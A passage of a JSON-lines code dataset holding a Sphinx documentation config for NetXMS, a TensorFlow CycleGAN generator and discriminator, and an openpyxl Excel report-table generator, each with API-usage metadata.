"line_number": 1073, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 1090, "usage_type": "call"}, {"api_name": "transformers.optimization.AdamW", "line_number": 1109, "usage_type": "call"}, {"api_name": "transformers.optimization.get_linear_schedule_with_warmup", "line_number": 1115, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 1124, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 1125, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 1126, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 1127, "usage_type": "call"}, {"api_name": "model_utils.saveCallBack", "line_number": 1129, "usage_type": "call"}]} +{"seq_id": "26495947385", "text": "# -*- coding: utf-8 -*-\nimport sys\nimport sphinx.builders.manpage\nimport docutils.nodes\nimport os\nimport glob\nfrom os.path import basename\n\n# -- General configuration ------------------------------------------------\nproduct_name = os.environ.get('PRODUCT', 'NetXMS')\nproduct_key = product_name.replace(' ', '-').lower()\nrst_epilog = '.. 
|product_name| replace:: %s' % product_name\n\nprint(os.path.abspath('../_lib'))\nsys.path.insert(0, os.path.abspath('../_lib'))\n\nextensions = [\n    'sphinx.ext.intersphinx',\n    'sphinx.ext.todo',\n    'sphinx.ext.ifconfig',\n    'wikipedia',\n]\n\ntemplates_path = ['../_templates']\n\nsource_suffix = '.rst'\nmaster_doc = 'index'\n\nproject_author = \"Raden Solutions, SIA\"\ncopyright = '2023, ' + project_author\n\nversion = '4.4'\nrelease = '4.4.3'\n\nexclude_patterns = ['build']\n\npygments_style = 'sphinx'\n\nlocale_dirs = ['_locale']\n\ntodo_include_todos = False\n\n# -- Options for HTML output ----------------------------------------------\nhtml_short_title = \"Home\"\n\non_rtd = os.environ.get('READTHEDOCS', None) == 'True'\nif on_rtd:\n    html_theme = 'default'\nelse:\n    import sphinx_rtd_theme\n    html_theme = 'sphinx_rtd_theme'\n\n#html_logo = '_images/logo.png'\nhtml_favicon = '../favicon.ico'\nhtml_static_path = ['_static']\nhtml_show_sourcelink = False\nhtml_show_sphinx = False\n#html_show_copyright = True\n\nif 'CI' in os.environ:\n    html_js_files = [('https://stats.raden.solutions/script.js', {'async': 'async', 'data-website-id':'e5a25886-8178-4d34-860f-f8cb9009a7e7'})]\n\n# -- Options for LaTeX output ---------------------------------------------\n# 'figure_align': 'H', - to avoid image floating to next page if it does not fit\nlatex_elements = {\n    'papersize': 'a4paper',\n    'pointsize': '8pt',\n    'figure_align': 'H',\n}\n\n#latex_elements = {\n#    'papersize': '',\n#    'fontpkg': '',\n#    'fncychap': '',\n#    'maketitle': '\\\\cover',\n#    'pointsize': '',\n#    'preamble': '',\n#    'releasename': \"\",\n#    'babel': '',\n#    'printindex': '',\n#    'fontenc': '',\n#    'inputenc': '',\n#    'classoptions': '',\n#    'utf8extra': '',\n#}\n#latex_additional_files = [\"../netxms.sty\" ]\n\nlatex_show_pagerefs = False\nlatex_domain_indices = False\nlatex_use_modindex = False\n\n#latex_logo = '_images/logo.png'\n\n# For \"manual\" documents, if this is true, then toplevel headings are parts,\n# not chapters.\n#latex_use_parts = False\n\n# If true, show page references after internal links.\n#latex_show_pagerefs = False\n\n# If true, show URL addresses after external links.\n#latex_show_urls = False\n\n# Documents to append as an appendix to all manuals.\n#latex_appendices = []\n\n# If false, no module index is generated.\n#latex_domain_indices = True\n\n# -- PlantUML settings ---------------------------------------------------------\n\nplantuml = '/usr/bin/java -Djava.awt.headless=true -jar ../_lib/plantuml.jar'\nplantuml_latex_output_format = 'pdf'\n\n# -- Custom code ---------------------------------------------------------------\ndef add_man_header_nodes(app, doctree, docname):\n    if isinstance(app.builder, sphinx.builders.manpage.ManualPageBuilder):\n        doctree.insert(0, docutils.nodes.raw('', '.if n .ad l\\n.nh\\n', format='manpage'))\n\ndef setup(app):\n    # fix hyphenation in generated man pages\n    app.connect('doctree-resolved', add_man_header_nodes)\n\n    # ignore custom modules except listed in $MODULES\n    modules = os.environ['MODULES'].split(',') if 'MODULES' in os.environ else []\n    extDirs = glob.glob('source/extensions/*')\n    for module in modules:\n        extDirs = [d for d in extDirs if module.strip() not in d]\n    for d in extDirs:\n        exclude_patterns.append(d[7:]) # remove 'source/'\n\n    app.add_css_file(\"theme_overrides.css\")\n    if product_name == 'NetXMS':\n        app.add_config_value('release_type', 'oss', 'env')\n    else:\n        app.add_config_value('release_type', 'ee', 'env')\n\n# -- Options for Epub output 
----------------------------------------------\n\n# Bibliographic Dublin Core info.\nepub_author = project_author\nepub_publisher = project_author\nepub_copyright = copyright\n\nepub_theme = 'epub'\n\n# A list of files that should not be packed into the epub file.\nepub_exclude_files = ['search.html']\n\n\n", "repo_name": "netxms/netxms-doc", "sub_path": "conf.py", "file_name": "conf.py", "file_ext": "py", "file_size_in_byte": 4165, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.environ.get", "line_number": 10, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.path.insert", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 46, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 60, "usage_type": "attribute"}, {"api_name": "sphinx.builders.manpage.builders", "line_number": 117, "usage_type": "attribute"}, {"api_name": "sphinx.builders.manpage", "line_number": 117, "usage_type": "name"}, {"api_name": "docutils.nodes.nodes.raw", "line_number": 118, "usage_type": "call"}, {"api_name": "docutils.nodes.nodes", "line_number": 118, "usage_type": "attribute"}, {"api_name": "docutils.nodes", "line_number": 118, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 125, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 126, "usage_type": "call"}]} +{"seq_id": "5472731335", "text": "import tensorflow as tf\nimport tensorflow_addons as tfa\nimport tensorflow.keras as keras\n\ndef _get_norm_layer(norm):\n    if norm is None:\n        return keras.layers.Lambda(lambda x: x)  # identity layer, so Sequential models stay well-formed\n    elif norm == 'batch_norm':\n        return keras.layers.BatchNormalization()\n    elif norm == 'instance_norm':\n        return tfa.layers.InstanceNormalization()\n    elif norm == 'layer_norm':\n        return 
keras.layers.LayerNormalization()\n    else:\n        raise ValueError('Normalization not found')\n\n\nclass ResBlock(keras.layers.Layer):\n    def __init__(self, dim, padding, norm):\n        super(ResBlock, self).__init__()\n        self.res_block = self.build_res_block(dim, padding, norm)\n\n    def build_res_block(self, dim, padding, norm):\n        res_block = []\n        res_block += [\n            keras.layers.Conv2D(dim, 3, padding=padding),\n            _get_norm_layer(norm),\n            keras.layers.ReLU()\n        ]\n\n        res_block += [\n            keras.layers.Conv2D(dim, 3, padding=padding),\n            _get_norm_layer(norm)\n        ]\n        return keras.Sequential(res_block)\n\n    def call(self, x):\n        return self.res_block(x) + x\n\nclass ResGenerator(keras.Model):\n    def __init__(self, input_nc, output_nc, fmaps, norm=\"instance_norm\", n_blocks=9, padding=\"same\", n_downsampling=2):\n        \"\"\" Construct a resnet generator\n        \n        Parameters: \n            input_nc (int)  -- the number of channels of input images\n            output_nc (int) -- the number of channels of output images\n            fmaps (int)     -- the base number of feature maps\n            n_downsampling (int) -- the number of downsampling steps\n            norm (str)      -- normalization layer: batch_norm | instance_norm | layer_norm\n            n_blocks (int)  -- the number of resnet block\n            padding (str)   -- padding type: valid | same\n        \"\"\"\n        super(ResGenerator, self).__init__()\n        assert(n_blocks >= 0)\n        \n        \"\"\" 1 \"\"\"\n        model = [\n            keras.layers.Conv2D(fmaps, 7, strides=1, padding=padding),\n            _get_norm_layer(norm),\n            keras.layers.ReLU()\n        ]\n        \"\"\" downsampling \"\"\"\n        for _ in range(n_downsampling):\n            fmaps *= 2\n            model += [\n                keras.layers.Conv2D(fmaps, 3, strides=2, padding=padding),\n                _get_norm_layer(norm),\n                keras.layers.ReLU()\n            ]\n\n        \"\"\" resblock \"\"\"\n        for _ in range(n_blocks):\n            model += [ResBlock(fmaps, padding, norm)]\n\n        \"\"\" upsampling \"\"\"\n        for _ in range(n_downsampling):\n            fmaps //= 2\n            model += [\n                keras.layers.Conv2DTranspose(fmaps, 3, strides=2, padding=padding),\n                _get_norm_layer(norm),\n                keras.layers.ReLU()\n            ]\n        \n        \"\"\" 2 \"\"\"\n        model += [\n            keras.layers.Conv2D(output_nc, 7, padding=padding),\n            keras.layers.Activation('tanh')\n        ]\n        self.model = keras.Sequential(model)\n\n    def call(self, x):\n        return self.model(x)\n\nclass NLayerDiscriminator(keras.Model):\n    \"\"\" PatchGAN Discriminator \"\"\"\n    def __init__(self, input_nc, fmaps, padding, n_layers=3, norm='batch_norm'):\n        \"\"\" Construct a PatchGAN discriminator\n\n        Parameters:\n            input_nc (int)  -- the number of channel of input image\n            fmaps (int)     -- the number of channel of feature maps\n            padding (str)   -- padding type: valid | same\n            n_layers (int)  -- the number of conv\n            norm (str)      -- normalization layer: batch_norm | instance_norm | layer_norm\n        \"\"\"\n        super(NLayerDiscriminator, self).__init__()\n        _fmaps = fmaps\n\n        # norm_layer = _get_norm_layer(norm)\n        \n        model = []\n        for i in range(n_layers):\n            fmaps = min(fmaps*2, _fmaps*8)\n            model += [\n                keras.layers.Conv2D(fmaps, 4, strides=2, padding=padding),\n                _get_norm_layer(norm),\n                keras.layers.LeakyReLU(alpha=0.2)\n            ]\n        \n        model += [\n            keras.layers.Conv2D(fmaps, 4, strides=1, padding=padding),\n            _get_norm_layer(norm),\n            keras.layers.LeakyReLU(alpha=0.2)\n        ]\n\n        model += [keras.layers.Conv2D(fmaps, 1, strides=1, padding=padding)]\n        self.model = keras.Sequential(model)\n\n    def call(self, x):\n        return self.model(x)", "repo_name": "RioRic/cycleGAN_tf2", "sub_path": "model/network.py", "file_name": "network.py", "file_ext": "py", "file_size_in_byte": 4456, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": 
"tensorflow.keras.layers.BatchNormalization", "line_number": 9, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 9, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 9, "usage_type": "name"}, {"api_name": "tensorflow_addons.layers.InstanceNormalization", "line_number": 11, "usage_type": "call"}, {"api_name": "tensorflow_addons.layers", "line_number": 11, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.LayerNormalization", "line_number": 13, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 13, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 13, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 18, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 26, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.ReLU", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 28, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 32, "usage_type": "name"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 35, "usage_type": "name"}, {"api_name": "tensorflow.keras.Model", "line_number": 40, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 40, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 58, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 58, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 58, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.ReLU", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 60, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 60, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 66, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.ReLU", "line_number": 68, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 68, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 68, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2DTranspose", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 79, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 79, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.ReLU", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 81, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 81, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 86, "usage_type": "call"}, {"api_name": 
"tensorflow.keras.layers", "line_number": 86, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 86, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Activation", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 87, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 87, "usage_type": "name"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 89, "usage_type": "name"}, {"api_name": "tensorflow.keras.Model", "line_number": 94, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 94, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 115, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 115, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 115, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.LeakyReLU", "line_number": 117, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 117, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 117, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 121, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 121, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 121, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.LeakyReLU", "line_number": 123, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 123, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 123, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 126, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 126, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 126, "usage_type": "name"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 127, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 127, "usage_type": "name"}]} +{"seq_id": "74820122435", "text": "# coding=utf-8\nfrom Tools import coordinate_transfer, style_range, divide_column\nfrom excel_generator.Common import bg_color, font_style, alignment, border_pattern, fill_pattern, alignment_pattern, \\\n font_pattern, side_style, thick_border\nfrom excel_generator.Cube import Cube\nfrom excel_generator.Style import Style\nfrom excel_generator.mock.SGM import page2\nfrom excel_generator.tool.RenderCore import RenderCore\nfrom template.HeaderTemplate import common_header_sgm_1\n\n\nclass MainTable:\n def __init__(self, core, title, header, data, x, y):\n self.title = title\n self.header = header\n self.data = data\n self.origin = [x, y]\n self.end_point = [x, y]\n self.core = core\n\n def _adjust_column_width(self, width):\n for column_cells in self.core.ws.columns:\n # length = max(len(as_text(cell.value)) for cell in column_cells)\n self.core.ws.column_dimensions[column_cells[0].column].width = width\n\n def _render_title(self):\n style = Style(bg_color[4], border=None, font=font_style[3], al=alignment[4])\n\n self.core.write_cube_to_book(self.origin[0], self.origin[1],\n Cube(bg_color[4], value=self.title, style=style))\n\n def _check_cube_style(self, x, y):\n for item in self.header['merge']:\n if item['coordinate'][0] == x and item['coordinate'][1] == y:\n return item['style']\n return Style(bg_color[4], border=side_style[1], 
font=font_style[2], al=alignment[2])\n\n    def _merge_body_cell(self, end_column, end_row, start_column, start_row,\n                         border, fill, font, al):\n        self.core.ws.merge_cells(start_row=start_row,\n                                 start_column=start_column,\n                                 end_row=end_row,\n                                 end_column=end_column)\n        # set merge cells style\n        coordinate = coordinate_transfer(start_row, start_column) + ':' + coordinate_transfer(end_row, end_column)\n        style_range(self.core.ws, coordinate, border, fill, font, al)\n\n    def _render_header(self):\n        # render cell with style\n        scale_x = self.header['scale'][0]\n        scale_y = self.header['scale'][1]\n        for i in range(scale_x):\n            for j in range(scale_y):\n                x = i + self.origin[0] + 1\n                # y must account for the title row\n                y = j + self.origin[1]\n                current_value = self.header['data'][i][j]\n                checked_style = self._check_cube_style(i, j)\n                current_cube = Cube(style=checked_style, value=current_value)\n                self.core.write_cube_to_book(x, y, current_cube)\n\n        # merge cell\n        if self.header['merge'] is not None:\n            bx = self.origin[0] + 1\n            by = self.origin[1]\n            for m in self.header['merge']:\n                start_row = m['coordinate'][0] + bx\n                start_column = m['coordinate'][1] + by\n                end_row = m['coordinate'][2] + bx\n                end_column = m['coordinate'][3] + by\n                self.core.ws.merge_cells(start_row=start_row,\n                                         start_column=start_column,\n                                         end_row=end_row,\n                                         end_column=end_column)\n                # get the style of the cells to be merged\n                current_style = m['style']\n\n                self._merge_body_cell(end_column, end_row, start_column, start_row,\n                                      border_pattern[current_style.border], fill_pattern[current_style.fill],\n                                      font_pattern[current_style.font], alignment_pattern[current_style.al])\n                # set border\n                coordinate = coordinate_transfer(start_row, start_column) + ':' + coordinate_transfer(end_row,\n                                                                                                      end_column)\n                style_range(self.core.ws, coordinate,\n                            border=border_pattern[current_style.border],\n                            fill=fill_pattern[current_style.fill],\n                            font=font_pattern[current_style.font],\n                            alignment=alignment_pattern[current_style.al])\n\n    def _list_divide(self, l1, l2):\n        res = []\n        for i in range(len(l1)):\n            res.append(float(l1[i]) / float(l2[i]))\n        return res\n\n    def _list_divide_subtract_1(self, l1, l2):\n        res = []\n        for i in range(len(l1)):\n            res.append(float(l1[i]) / float(l2[i]) - 1.0)\n        return res\n\n    def _cal_end_point(self):\n        hx = self.header['scale'][0]\n        hy = self.header['scale'][1]\n        scale_x = len(self.data)\n        self.end_point = [self.origin[0] + hx + scale_x + 1, self.origin[1] + hy - 1]\n\n    def _add_table_border(self):\n        coordinate = coordinate_transfer(self.origin[0] + 1, self.origin[1]) + ':' + \\\n                     coordinate_transfer(self.end_point[0], self.end_point[1])\n        style_range(self.core.ws, coordinate, thick_border)\n\n    def _get_all_data_by_column(self, name):\n        res = []\n        if name == 'LE KL':\n            for p in self.data:\n                res.append(p['LE KL'])\n            return res\n        elif name == 'Market size KL(this year)':\n            for p in self.data:\n                res.append(p['Market size KL(this year)'])\n            return res\n        elif name == 'Market size KL(last year)':\n            for p in self.data:\n                res.append(p['Market size KL(last year)'])\n            return res\n        elif name == 'Market Share %':\n            return self._list_divide(self._get_all_data_by_column('LE KL'),\n                                     self._get_all_data_by_column('Market size KL(this year)'))\n        elif name == 'Market Growth %':\n            return self._list_divide_subtract_1(self._get_all_data_by_column('Market size KL(this year)'),\n                                                self._get_all_data_by_column('Market size KL(last year)'))\n        else:\n            pass\n\n    def _formula_converter(self, name, row, flag, x, y, number_format):\n        tmp_y = y - self.origin[1]\n        if tmp_y < 4:\n            style = 
Style(bg_color=bg_color[4], border=side_style[1], al=alignment[1])\n elif tmp_y >= 3 and flag == 0:\n style = Style(bg_color=bg_color[2], border=side_style[1], al=alignment[2])\n elif flag < 0:\n style = Style(bg_color=bg_color[4], border=side_style[1], al=alignment[2])\n else:\n style = Style(bg_color=bg_color[1], border=side_style[1])\n formula = ''\n if flag == 0:\n return Cube(style=style, number_format=number_format, value=row[name])\n elif name == 'Market Share %':\n formula = '={0}/{1}'.format(coordinate_transfer(x, y - 2), coordinate_transfer(x, y - 1))\n\n elif name == 'Market Growth %':\n formula = '={0}/{1}-1'.format(coordinate_transfer(x, y - 3), coordinate_transfer(x, y - 1))\n\n elif name == 'Market Share Score':\n a, b, c, d = divide_column(self._get_all_data_by_column('Market Share %'))\n formula = '=IF({0}<{1}, 5, IF({0}<{2}, 4, IF({0}<{3},3, IF({0}<{4}, 2, 1))))'.format(\n coordinate_transfer(x, y - 4), a, b, c, d)\n\n elif name == 'Market Growth Score':\n a, b, c, d = divide_column(self._get_all_data_by_column('Market Growth %'))\n formula = '=IF({0}<{1}, 5, IF({0}<{2}, 4, IF({0}<{3},3, IF({0}<{4}, 2, 1))))'.format(\n coordinate_transfer(x, y - 3), a, b, c, d)\n\n elif name == 'Market Share Score(0.75)':\n formula = '={0}*0.75'.format(coordinate_transfer(x, y - 3))\n\n elif name == 'Market Growth Score(0.15)':\n formula = '={0}*0.15'.format(coordinate_transfer(x, y - 3))\n\n elif name == 'Platform Score(0.1)':\n formula = '={0}*0.1'.format(coordinate_transfer(x, y - 3))\n\n elif name == 'Platform Score':\n formula = '={0}'.format(coordinate_transfer(x, y - 3))\n\n elif name == 'Total Score':\n formula = '=SUM({0}:{1})'.format(coordinate_transfer(x, y - 3), coordinate_transfer(x, y - 1))\n\n elif name == 'Increase %':\n row = len(self.data)\n formula = '={0}*({1}-{2})/SUMPRODUCT({3}:{4},{5}:{6})'.format(\n coordinate_transfer(x, y - 1),\n coordinate_transfer(self.origin[0] + 1 + row + 1, y + 1),\n coordinate_transfer(self.origin[0] + 1 + row, y - 13),\n coordinate_transfer(self.origin[0] + 1 + 1, y - 13),\n coordinate_transfer(self.origin[0] + row, y - 13),\n coordinate_transfer(self.origin[0] + 1 + 1, y - 1),\n coordinate_transfer(self.origin[0] + row, y - 1),\n )\n elif name == 'Ref Target KL':\n formula = '={0}*(1+{1})'.format(coordinate_transfer(x, y - 14), coordinate_transfer(x, y - 1))\n\n else:\n pass\n return Cube(style=style, formula=formula, number_format=number_format)\n\n def _render_body(self):\n bx = self.header['scale'][0] + self.origin[0] + 1\n by = self.origin[1]\n scale_x = len(self.data)\n scale_y = self.header['scale'][1]\n\n for i in range(scale_x):\n for j in range(scale_y):\n cx = bx + i\n cy = by + j\n col_name = self.header['data'][0][j]\n number_format = self.header['number_format'][j]\n formula_flag = self.header['formula'][j]\n current_cube = self._formula_converter(col_name, self.data[i], formula_flag, cx, cy, number_format)\n self.core.write_cube_to_book(cx, cy, current_cube)\n\n def _render_footer(self):\n # render total row\n sum_total = self.header['total']\n scale_x = len(self.data)\n foot_x = self.origin[0] + self.header['scale'][0] + scale_x\n foot_y = self.origin[1]\n for i in range(self.header['scale'][1]):\n if i < 3:\n current_cube = Cube(\n style=Style(bg_color=bg_color[4], border=side_style[3], al=alignment[1], font=font_style[2]),\n value='Sum Total')\n self.core.write_cube_to_book(foot_x, foot_y + i, current_cube)\n else:\n flag = sum_total[i]\n if flag == 1:\n current_cube = Cube(\n style=Style(bg_color=bg_color[1], 
border=side_style[3], al=alignment[3], font=font_style[2]))\n start = coordinate_transfer(self.origin[0] + 1 + self.header['scale'][0], foot_y + i)\n end = coordinate_transfer(foot_x - 1, foot_y + i)\n current_cube.set_formula('=SUM({0}:{1})'.format(start, end))\n self.core.write_cube_to_book(foot_x, foot_y + i, current_cube)\n else:\n current_cube = Cube(\n style=Style(bg_color=bg_color[1], border=side_style[3], al=alignment[3], font=font_style[2]),\n value='N/A')\n self.core.write_cube_to_book(foot_x, foot_y + i, current_cube)\n self._merge_body_cell(foot_y + 3, foot_x, foot_y, foot_x,\n border_pattern[side_style[3]], fill_pattern[bg_color[4]],\n font_pattern[font_style[2]], alignment_pattern[alignment[1]])\n\n # render global\n for i in range(self.header['scale'][1]):\n if i < 3:\n current_cube = Cube(\n style=Style(bg_color=bg_color[4], border=side_style[1], al=alignment[1], font=font_style[2]),\n value='Target From Global')\n self.core.write_cube_to_book(foot_x + 1, foot_y + i, current_cube)\n elif i < 18:\n current_cube = Cube(\n style=Style(bg_color=bg_color[4], border=side_style[1], al=alignment[3], font=font_style[1]),\n value='N/A')\n self.core.write_cube_to_book(foot_x + 1, foot_y + i, current_cube)\n else:\n current_cube = Cube(\n style=Style(bg_color=bg_color[3], border=side_style[1], al=alignment[3], font=font_style[2]),\n value=None)\n self.core.write_cube_to_book(foot_x + 1, foot_y + i, current_cube)\n self._merge_body_cell(foot_y + 3, foot_x + 1, foot_y, foot_x + 1,\n border_pattern[side_style[1]], fill_pattern[bg_color[4]],\n font_pattern[font_style[2]], alignment_pattern[alignment[1]])\n\n def render(self):\n self._render_title()\n self._render_header()\n self._render_body()\n self._adjust_column_width(16)\n self._render_footer()\n self._cal_end_point()\n self._add_table_border()\n\n\nif __name__ == '__main__':\n from openpyxl import Workbook\n\n wb = Workbook()\n ws = wb.active\n c = RenderCore(ws)\n table = MainTable(c, 'I am Title!', common_header_sgm_1[1], page2, 2, 2)\n table.render()\n table.core.ws.sheet_view.showGridLines = False\n wb.save('SGM.xlsx')\n", "repo_name": "intwzt/ShellExcel", "sub_path": "excel_generator/model/SGM/page1/MainTable.py", "file_name": "MainTable.py", "file_ext": "py", "file_size_in_byte": 13281, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "excel_generator.Style.Style", "line_number": 27, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 27, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_style", "line_number": 27, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 27, "usage_type": "name"}, {"api_name": "excel_generator.Cube.Cube", "line_number": 30, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 30, "usage_type": "name"}, {"api_name": "excel_generator.Style.Style", "line_number": 36, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 36, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 36, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_style", "line_number": 36, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 36, "usage_type": "name"}, {"api_name": "Tools.coordinate_transfer", "line_number": 45, "usage_type": "call"}, {"api_name": "Tools.style_range", "line_number": 46, "usage_type": "call"}, 
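The `_formula_converter` and footer logic in the MainTable.py record above assemble Excel formulas from numeric (row, column) pairs through `Tools.coordinate_transfer`, which is not included in this record. As an illustration only — `coordinate_transfer_sketch` is a hypothetical stand-in, not the repo's implementation — the same "C7"-style coordinates can be produced with openpyxl's `get_column_letter`:

# Hypothetical sketch of a (row, column) -> "A1"-style helper; the real
# Tools.coordinate_transfer is not part of this record.
from openpyxl.utils import get_column_letter

def coordinate_transfer_sketch(row, column):
    # openpyxl columns are 1-based, so get_column_letter(3) == 'C'
    return "{}{}".format(get_column_letter(column), row)

# Composing a range formula the way _formula_converter builds its strings:
start = coordinate_transfer_sketch(2, 3)      # 'C2'
end = coordinate_transfer_sketch(9, 3)        # 'C9'
formula = '=SUM({0}:{1})'.format(start, end)  # '=SUM(C2:C9)'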
{"api_name": "excel_generator.Cube.Cube", "line_number": 59, "usage_type": "call"}, {"api_name": "excel_generator.Common.border_pattern", "line_number": 79, "usage_type": "name"}, {"api_name": "excel_generator.Common.fill_pattern", "line_number": 79, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_pattern", "line_number": 80, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment_pattern", "line_number": 80, "usage_type": "name"}, {"api_name": "Tools.coordinate_transfer", "line_number": 82, "usage_type": "call"}, {"api_name": "Tools.style_range", "line_number": 84, "usage_type": "call"}, {"api_name": "excel_generator.Common.border_pattern", "line_number": 85, "usage_type": "name"}, {"api_name": "excel_generator.Common.fill_pattern", "line_number": 86, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_pattern", "line_number": 87, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment_pattern", "line_number": 88, "usage_type": "name"}, {"api_name": "Tools.coordinate_transfer", "line_number": 109, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 110, "usage_type": "call"}, {"api_name": "Tools.style_range", "line_number": 111, "usage_type": "call"}, {"api_name": "excel_generator.Common.thick_border", "line_number": 111, "usage_type": "argument"}, {"api_name": "excel_generator.Style.Style", "line_number": 139, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 139, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 139, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 139, "usage_type": "name"}, {"api_name": "excel_generator.Style.Style", "line_number": 141, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 141, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 141, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 141, "usage_type": "name"}, {"api_name": "excel_generator.Style.Style", "line_number": 143, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 143, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", 